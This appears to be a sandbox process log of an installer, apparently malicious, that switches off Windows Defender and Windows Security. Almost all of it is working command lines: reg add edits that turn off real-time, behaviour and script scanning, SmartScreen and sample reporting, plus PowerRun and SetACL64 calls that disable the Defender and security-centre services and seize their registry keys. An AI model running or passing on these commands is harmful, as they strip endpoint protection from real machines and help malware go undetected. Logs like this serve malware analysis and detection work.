reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Get-MpPreference"

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\do64.bat

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"

